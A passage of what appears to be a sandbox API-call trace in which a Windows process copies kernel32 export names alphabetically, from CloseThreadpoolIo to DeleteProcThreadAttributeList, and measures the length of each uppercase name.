(lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.414] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.414] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.414] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.414] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.414] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.414] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.415] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.415] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.415] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.415] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.415] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.415] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.415] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.415] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.415] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.415] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.415] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.415] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.415] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.415] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.415] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.415] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.415] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.415] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.416] lstrlenA (lpString="COPYFILEA") returned 9 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.416] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.416] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.416] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.416] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.416] lstrlenA (lpString="COPYFILEW") returned 9 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.416] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.416] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.416] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.416] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.416] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.416] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.416] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.416] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.416] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.416] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.416] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.416] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.417] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.417] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.417] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.417] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.417] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.417] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.417] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.417] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.417] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.417] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.417] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.417] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.417] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.417] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.417] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.417] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.417] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.417] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.418] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.418] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.418] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.418] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.418] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.418] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.418] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.418] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.418] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.418] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.418] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.418] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.418] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.418] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.418] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.418] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.418] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.419] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.419] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.419] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.419] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.419] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.419] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.419] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.419] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.419] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.419] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.419] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.419] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.419] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.419] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.419] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.419] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.419] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.419] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.420] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.420] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.420] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.420] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.420] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.420] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.420] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.420] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.420] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.420] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.420] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.420] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.420] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.421] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.421] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.421] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.421] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.421] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.421] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.421] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.421] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.421] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.421] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.421] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.421] lstrlenA (lpString="DELETEATOM") returned 10 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.421] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.421] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.421] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.421] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.421] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.421] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.421] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.422] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.422] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, 